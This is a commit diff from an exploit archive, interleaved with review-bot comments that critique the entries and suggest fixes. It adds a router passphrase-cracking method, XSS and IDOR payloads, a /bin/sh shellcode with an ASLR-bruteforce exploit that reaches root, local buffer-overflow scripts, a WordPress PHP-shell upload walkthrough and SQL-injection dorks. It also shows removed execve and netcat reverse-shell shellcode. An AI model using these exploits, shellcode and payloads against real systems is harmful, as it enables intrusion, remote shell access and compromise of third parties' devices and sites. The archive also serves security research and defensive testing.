DB: 2016-06-28

14 new exploits

Linux Netcat Reverse Shell - 32bit - 77 bytes

XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability

Linux x86_64 execve Shellcode - 15 bytes
WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload
OPAC KpwinSQL - SQL Injection
Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm
Option CloudGate CG0192-11897 - Multiple Vulnerabilities
Kagao 3.0 - Multiple Vulnerabilities
Panda Security Multiple Products - Privilege Escalation
MyLittleForum 2.3.5 - PHP Command Injection
iBilling 3.7.0 - Stored and Reflected XSS
PInfo 0.6.9-5.1 - Local Buffer Overflow
BigTree CMS 4.2.11 - SQL Injection
HNB 1.9.18-10 - Local Buffer Overflow
Linux x86 /bin/sh Shellcode + ASLR Bruteforce
SugarCRM 6.5.18 - PHP Code Injection
Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-06-28 05:03:46 +00:00
parent 3739831fb2
commit e9145685e4
17 changed files with 1450 additions and 170 deletions


@ -30635,7 +30635,6 @@ id,file,description,date,author,platform,type,port
34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
40007,platforms/lin_x86/shellcode/40007.c,"Linux Netcat Reverse Shell - 32bit - 77 bytes",2016-06-23,CripSlick,lin_x86,shellcode,0
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
34010,platforms/win32/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
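Review bot: the removed row 40007 sat between ids 34007 and 34008, out of numeric order for this CSV, so deleting it here also repairs the ordering; the 32-bit netcat reverse shell source removed later in this commit is shown without a path header, so confirm it is platforms/lin_x86/shellcode/40007.c and that no other row still references that path.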
@ -35694,7 +35693,7 @@ id,file,description,date,author,platform,type,port
39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Lal",windows,dos,0
39471,platforms/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow SEH (DoS)",2016-02-19,"Shantanu Khandelwal",windows,dos,0
39472,platforms/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0
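Review bot: the only change in this hunk is the author field of row 39470 (Pawan Dxb to Pawan Lal), which matches the author recorded for the new row 40026 later in this commit, so the two entries are now attributed consistently; nothing else to raise.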
@ -36159,7 +36158,6 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
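Review bot: removing row 39975 (Linux x86_64 execve Shellcode - 15 bytes) must be paired with deleting platforms/lin_x86-64/shellcode/39975.c; the 48-line x86_64 execve source removed later in this commit appears without a path header in this view, so verify it is that file. The surrounding rows remain in id order.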
@ -36190,3 +36188,17 @@ id,file,description,date,author,platform,type,port
40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) CSRF",2016-06-23,HaHwul,php,webapps,80
40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80
40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
40022,platforms/php/webapps/40022.txt,"iBilling 3.7.0 - Stored and Reflected XSS",2016-06-27,"Bikramaditya Guha",php,webapps,80
40023,platforms/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0
40024,platforms/php/webapps/40024.txt,"BigTree CMS 4.2.11 - SQL Injection",2016-06-27,"Mehmet Ince",php,webapps,80
40025,platforms/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0
40026,platforms/lin_x86/shellcode/40026.txt,"Linux x86 /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80
40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443
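Review bot: row 40014's description lacks the " - " separator every other row uses between product and issue; suggest "Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm" (the commit message uses a dash there as well). Also, ids 40015, 40017 and 40018 are skipped in this block, and 40014 is filed under type dos although the advisory describes a weak default passphrase scheme rather than a denial of service; confirm both are intended.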


@ -0,0 +1,34 @@
# Exploit Title: Magnet Networks Weak WPA-PSK passphrases used in Tesley CPVA 642 Router
# Google Dork:
# Date: 01/06/2016
# Author: Matt O'Connor
# Advisory Link: https://www.rgb.ie/magnet-broadband-weak-wpa-psk-algorithm.pdf
# Version:
# Category: Remote
# Tested on: Magnet Networks Tesley CPVA 642
The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
• Starts with MAGNET0
• Adds six random numerical digits
• 1 million possible combinations ( MAGNET0000000 MAGNET0999999 )
The entire keyspace can be generated using “mask processor” by ATOM, piping each letter out to its own file, for example:
./mp32 MAGNET0?1?1?1?1?1?1 > magnet_networks_tesley_ks.txt
The .txt file weighs in at around 45mb.
Using a 1.4ghz i3 processor on a budget laptop, we were hitting 1,000 keys per second. Breakdown below:
• 1,000,000 / 1,000 keys per second = 1,000 seconds
• 1,000 / 60 seconds = 16~ minutes
The WPA-PSK handshake we used has the password MAGNET0349325 and was cracked within ~6 minutes.
If youre using the default password on your Magnet Networks Tesley CPVA 642 Router, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.
On the 20th of June 2016, Magnet Networks Customer Care confirmed via email that these routers are not used by Magnet Networks anymore.
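Review bot: the Google Dork and Version header fields are empty and the Date reads 01/06/2016 while the CSV row uses ISO 2016-06-27; fill or drop the empty fields and use one date format. The arithmetic is consistent (1,000,000 keys at 1,000 keys/s is 1,000 s, about 16.7 minutes, and the ~6 minute result is within that bound). "youre" should read "you're". The defensive point is the closing recommendation: a fixed prefix plus six digits is a 10^6 keyspace, so any such default must be replaced, and the vendor statement that these routers are no longer deployed belongs in the entry.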


@ -0,0 +1,59 @@

Option CloudGate Insecure Direct Object References Authorization Bypass
Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897
Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.
Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.
Tested on: lighttpd 1.4.39
firmware 2.62.4
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php
11.06.2016
--
GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
GET /api/goatgates
OR
/#/firewall
/#/system
/#/ipsec
/#/provisioning
XSS:
http://127.0.0.2/api/replacementui<script>alert(1)</script>
http://127.0.0.2/api/goatgates<script>alert(2)</script>
http://127.0.0.2/api/Blah-Blah<script>alert(3)</script>
http://127.0.0.2/api/<script>alert(4)</script>
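Review bot: the IDOR/authorization-bypass claim is supported only by a list of paths (GET /partials/... and /api/...); add the observed response to one unauthenticated request against the expected 401/403, otherwise the entry is not reproducible from the text alone. The XSS section uses http://127.0.0.2 as a host placeholder and should say so. Minor: the file opens with a blank line, "us cellular operators" should be "US", and the date 11.06.2016 differs in format from the CSV's 2016-06-27.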


@ -1,48 +0,0 @@
#include<stdio.h>
#include<string.h>
// OS-20614
// eben_s_dowling@georgiasouthern.edu
/*
global _start
_start:
execve:
mov rsi, rax
mov rdx, rsi
mov r12 , 0x68732f6e69622f
push r12
push rsp
pop rdi
mov al, 0x3b
syscall
*/
unsigned char code[] = \
"\x48\x89\xc6" // mov %rax,%rsi
"\x48\x89\xf2" // mov %rsi,%rdx
"\x49\xbc\x2f\x62\x69\x6e\x2f" // movabs $0x68732f6e69622f,%r12
"\x73\x68\x00"
"\x41\x54" // push %r12
"\x54" // push %rsp
"\x5f" // pop %rdi
"\xb0\x3b" // mov $0x3b,%al
"\x0f\x05" // syscall
;
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
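Review bot: the deletion is justified by the listing itself. The "15 bytes" of the former CSV description is what strlen(code) reports because it stops at the 0x00 inside the movabs immediate ("\x2f\x62\x69\x6e\x2f\x73\x68\x00"); the array is actually 24 bytes and contains a null, so both the size claim and the implied null-free property were wrong. The code also depends on rax being 0 on entry (mov rsi, rax; mov rdx, rsi) without stating it, and main() is declared without a return type.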


@ -1,119 +0,0 @@
#include <stdio.h>
#include <string.h>
//eben_s_dowling@georgiasouthern.edu
//OffSec ID: OS-20614
/*
global _start
_start:
;/bin//nc -e///bin/sh 10.0.0.6 99
xor eax,eax ; clear eax
xor edx,edx ; clear edi
; 0xIN-LAST IN-FIRST
push 0x39393939
mov esi, esp ; port in 4 hex bytes
push eax ; push null ------------
jmp short ipADDR
continue:
pop edi ; ipADDR
push eax ; push null ------------
push 0x68732F6E
push 0x69622F2F ; //bin/sh
push 0x2F2F652D ; -e//
mov ecx, esp
push eax ; push null ------------
push 0x636e2f2f ;
push 0x6e69622f ; push /bin
mov ebx, esp ; mov /bin//nc
push eax ; push null -----------
;--------------FIRST PUSH FINISHED------------------------
push esi ; push port
push edi ; push ipADDR
push ecx ; push -e////bin/sh
push ebx ; push /bin//nc
;--------------SECOND PUSH FINISHED------------------------
xor ecx, ecx
xor edx, edx
;--------------REGISTERS CLEARED FOR EXECVE----------------
mov ecx,esp ; mov /bin//nc > ecx ecx = long pointer
mov al,0x0b ; execve syscall
int 0x80 ; syscall
ipADDR:
call continue
db "10.0.0.6"
*/
#define PORT "\x39\x39\x39\x39" //port = 9999
/*To keep this shellcode at 52 bytes,
limit the port to 4 bytes*/
#define ipADDR "\x31\x30\x2e\x30\x2e\x30\x2e\x36" //IP = 10.0.0.6
//Both the IP & PORT are converted from ascii to hex
unsigned char shellcode[] =
// <_start>
"\x31\xc0" // xor %eax,%eax
"\x31\xd2" // xor %edx,%edx
"\x68"PORT // push $0x39393939
"\x89\xe6" // mov %esp,%esi
"\x50" // push %eax
"\xeb\x2f" // jmp 804809d <ipADDR>
// <continue>
"\x5f" // pop %edi
"\x50" // push %eax
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x68\x2d\x65\x2f\x2f" // push $0x2f2f652d
"\x89\xe1" // mov %esp,%ecx
"\x50" // push %eax
"\x68\x2f\x2f\x6e\x63" // push $0x636e2f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
"\x56" // push %esi
"\x57" // push %edi
"\x51" // push %ecx
"\x53" // push %ebx
"\x31\xc9" // xor %ecx,%ecx
"\x31\xd2" // xor %edx,%edx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// <ipADDR>
"\xe8\xcc\xff\xff\xff" // call 804806e <continue>
ipADDR
;
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)(void))shellcode)();
return 0;
}
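Review bot: the deletion is warranted: the in-code comment says the shellcode is kept at 52 bytes, the CSV row said 77 bytes, and summing the listed byte strings gives 52 bytes of code plus the 8-byte ipADDR string, so none of the three figures agree. Logic problems in the listing: the port string pushed as 0x39393939 is never NUL-terminated, because the push eax that follows lands below it on the stack rather than above; the comment on "xor edx,edx ; clear edi" names the wrong register; and printf passes the size_t from strlen to %d.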


@ -0,0 +1,125 @@
/bin/sh shellcode Ubuntu 14.0.4 32 bit + ASLR Bruteforce
#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal dxb.pawan@gmail.com
*vim shellcodeandaslrbruteforce.c*
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
void vuln (const char* arg){
char buffer[100];
strcpy(buffer, arg);
printf("Hello %s\n", buffer);
printf("[+] buffer @ %p\n", buffer);
}
int main (int argc, char **argv){
if (argc != 2) {
printf("Usage: %s <buffer>\n", argv[0]);
exit(1);
}
vuln(argv[1]);
return 0;
}
Makefile with below command
usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce
Turn On ASLR:
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################
*shellcode that executes '/bin/sh'*
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp ;moving the pointer to "/bin//sh" to ebx
push eax ;push 0 (=eax)
mov edx, esp ;moving 0 to edx
push ebx
mov ecx, esp ;moving the pointer to "/bin//sh" to ecx
mov al, 11
int 0x80 ;execv syscall
################################################################
*Final exploit using /bin/sh shellcode and ASLR bruteforce*
*vim shellcodeandaslrbruteforce.py*
#!/usr/bin/python
import struct, sys, time
from subprocess import PIPE, Popen
# exec /bin/sh
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
bufsize = 100
offset = 12 #incl. saved ebp
nopsize = 4096
def prep_buffer(addr_buffer):
buf = "A" * (bufsize+offset)
buf += struct.pack("<I",(addr_buffer+bufsize+offset+4))
buf += "\x90" * nopsize
buf += shellcode
return buf
def brute_aslr(buf):
p = Popen(['./bof', buf]).wait()
if __name__ == '__main__':
addr_buffer = 0xbf92b39c # randomly decided
buf = prep_buffer(addr_buffer)
i = 0
while True:
print i
brute_aslr(buf)
i += 1
##################################################################
root@ubuntu:~/bof/shellcodeandaslrbruteforce
⇒ python shellcodeandaslrbruteforce.py
(...)
(...)
[+] buffer @ 0xbfc2bc0c
996
(... snippet)
[+] buffer @ 0xbfb9930c
997
(... snippet)
[+] buffer @ 0xbf92721c
998
(... snippet)
[+] buffer @ 0xbf92a26c
# whoami
root
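Review bot: the Python driver runs './bof' while the gcc line produces a binary named shellcodeandaslrbruteforce, so the script does not run against the program as built; use one name. "Ubuntu 14.0.4" on the first line should be 14.04 as in the header, the Popen result assigned in brute_aslr is unused, and the script is Python 2 (print i). The point the entry demonstrates is that 32-bit stack ASLR has too little entropy to resist retrying one fixed address once -fno-stack-protector and -z execstack are used; read the gcc line as the mitigation list in reverse: keep the stack protector and NX and add PIE, and this loop has nothing to land on.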

platforms/linux/local/40023.py Executable file

@ -0,0 +1,73 @@
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: PInfo - File viewer
# Version: 0.6.9-5.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: An alternative info-file viewer
# pinfo is an viewer for Info documents, which is based on ncurses.
# Kali Linux 2.0 package: pool/main/p/pinfo/pinfo_0.6.9-5.1_i386.deb
# MD5sum: 9487efb0be037536eeda31b588cb6f89
# Website:http://pinfo.alioth.debian.org/
#
# $ run -m `python -c 'print "A"*564+"DCBA"'`
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000002 EBX: 0xB7F0B000 ECX: 0x00004554 EDX: 0x00000100
# o d I t s z a P c
# ESI: 0x41424344 EDI: 0x00004554 EBP: 0xBFFFF4A4 ESP: 0xBFFFEF30
# EIP: 0xB7D92832
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7d92832 <__GI_getenv+114>: cmp di,WORD PTR [esi]
# 0xb7d92835 <__GI_getenv+117>: jne 0xb7d92828 <__GI_getenv+104>
# 0xb7d92837 <__GI_getenv+119>: mov eax,DWORD PTR [esp+0x14]
# 0xb7d9283b <__GI_getenv+123>: mov DWORD PTR [esp+0x8],eax
# 0xb7d9283f <__GI_getenv+127>: mov eax,DWORD PTR [esp+0x18]
# 0xb7d92843 <__GI_getenv+131>: mov DWORD PTR [esp+0x4],eax
# 0xb7d92847 <__GI_getenv+135>: lea eax,[esi+0x2]
# 0xb7d9284a <__GI_getenv+138>: mov DWORD PTR [esp],eax
# --------------------------------------------------------------------------------
#
# gdb$ x/100x $esp
# 0xbffff250: 0xbffff49c 0x00000003 0x00000001 0x00000002
# 0xbffff260: 0xb7d6ebf8 0xb7fe78bd 0xb7d74ffd 0x41049384
# 0xbffff270: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff280: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff290: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff2a0: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff2b0: 0x41414141 0x41414141 0x41414141 0x41414141
import os, subprocess
def run():
try:
print "# PInfo File Viewer - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 564
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["pinfo -m",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, PInfo File Viewer - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit PInfo 0.6.9-5.1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
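Review bot: the crash evidence does not support a control-flow hijack: the gdb output shows SIGSEGV inside __GI_getenv on "cmp di,WORD PTR [esi]" with ESI=0x41424344, a corrupted pointer read rather than EIP control, yet the script hardcodes eip = "\x40\xf3\xff\xbf". The script also cannot run as written: subprocess.call(["pinfo -m", ' ', buffer]) passes "pinfo -m" as a single argv[0], so exec fails with ENOENT even when pinfo is installed and the "Not found" branch fires; buffer = nopsled * (buffersize-len(shellcode)) + eip repeats the 200-byte sled hundreds of times and never appends the shellcode; sys is used in howtousage but never imported; and the try/except IndexError around two print statements can never trigger. As submitted this is a crash PoC and the entry should say so.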

platforms/linux/local/40025.py Executable file

@ -0,0 +1,65 @@
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: HNB - Organizer
# Version: 1.9.18-10
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Hnb is an ncurses program to organize many
kinds of data in one place, for
# example addresses, todo lists, ideas, book reviews or to store snippets of
# brainstorming.
# Kali Linux 2.0 package: pool/main/h/hnb/hnb_1.9.18-10_i386.deb
# MD5sum: 1e1ff680f6e94a1a28ca85eeb3ea6aa0
# Website:http://hnb.sourceforge.net/
#
# gdb$ run -rc `python -c 'print "A"*108'`
# Starting program: /usr/bin/hnb -rc `python -c 'print "A"*108'`
# *** buffer overflow detected ***: /usr/bin/hnb terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb7e14773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7ea4b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb7ea2c3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7ea2127]
# /usr/bin/hnb[0x8049669]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb7dc1a63]
# /usr/bin/hnb[0x804a2d9]
# ======= Memory map: ========
# 08048000-0806e000 r-xp 00000000 08:01 2253992 /usr/bin/hnb
# 0806e000-0806f000 r--p 00025000 08:01 2253992 /usr/bin/hnb
# 0806f000-08070000 rw-p 00026000 08:01 2253992 /usr/bin/hnb
# 08070000-080b1000 rw-p 00000000 00:00 0 [heap]
import os, subprocess
def run():
try:
print "# HNB Organizer - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 108
nopsled = "\x90"*40
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["hnb -rc",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, HNB File Viewer - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit HNB 1.9.18-10 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
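Review bot: the backtrace shows "*** buffer overflow detected ***" raised from __strcpy_chk via __fortify_fail, i.e. the packaged hnb binary is built with FORTIFY_SOURCE and aborts on the overlong -rc argument before any saved return address is used; that is a controlled abort, not an exploitable overwrite, so the hardcoded eip of 0xbffff340 cannot take effect. The script repeats the defects of 40023.py in this commit: "hnb -rc" as a single argv[0] (ENOENT), the NOP sled multiplied by buffersize-len(shellcode) with the shellcode never appended, sys used without import, and a try/except IndexError that cannot fire. The entry should be labelled a crash/DoS PoC.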

platforms/php/webapps/40012.txt Executable file

@ -0,0 +1,78 @@
# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox.
# Demo: https://youtu.be/FSRZlD3SVQc
====================
DESCRIPTION
====================
An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory if the plugin is premium version and the remote
attacker have an especific account (contributor|editor|author|administrator) who can manage this plugin.
===================
STEPS TO REPRODUCE
===================
1.- Go to "Custom fields" tab and add a new custom field with "type" file.
2.- Go to "Products" tab, Now you can see a new field with that you added previously.
3.- Select your php shell and save the product.
4.- Go to uri "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.
================
Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check for file extensions.
function UPCP_Handle_File_Upload($Field_Name) {
..
if (!is_user_logged_in()) {exit();}
/* Make sure that the file exists */
elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
$error = __('No file was uploaded here..', 'UPCP');
}
/* Move the file and store the URL to pass it onwards*/
else {
$msg .= $_FILES[$Field_Name]['name'];
//for security reason, we force to remove all uploaded file
$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
//create the uploads directory if it doesn't exist
if (!file_exists($target_path)) {
mkdir($target_path, 0777, true);
}
$target_path = $target_path . basename( $_FILES[$Field_Name]['name']);
if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
$error .= "There was an error uploading the file, please try again!";
}
...
}
?>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
==========
time-line
==========
2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclousure
===================================
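Review bot: the quoted UPCP_Handle_File_Upload confirms the root cause: the only gate is is_user_logged_in(), with no capability check (current_user_can) and no file type validation before move_uploaded_file, the destination name comes straight from basename($_FILES[..]['name']), and the upload directory is created 0777. The fix is to route the upload through wp_handle_upload(), which enforces the allowed MIME/extension list, and to require an explicit capability. Text nits: "especific" -> "specific", "disclousure" -> "disclosure", the path on the "located in" line has an unmatched backtick, and the timeline records discovery on 2015-08-08 but vendor contact only on 2016-06-21, which should be explained or corrected.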

platforms/php/webapps/40013.txt Executable file

@ -0,0 +1,31 @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
File: zanzam.php
Parameter: detail_num
Test > http://localhost:8888/zaznam.php?detail_num=1'
Response:
